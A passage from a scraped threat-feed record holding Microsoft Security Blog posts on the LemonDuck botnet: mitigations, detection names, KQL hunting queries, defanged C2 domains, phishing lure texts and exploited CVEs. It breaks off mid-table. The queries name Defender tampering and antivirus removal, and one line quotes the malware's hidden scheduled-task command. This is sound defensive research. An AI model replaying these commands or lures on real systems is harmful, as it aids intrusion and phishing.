botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mmpc", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var 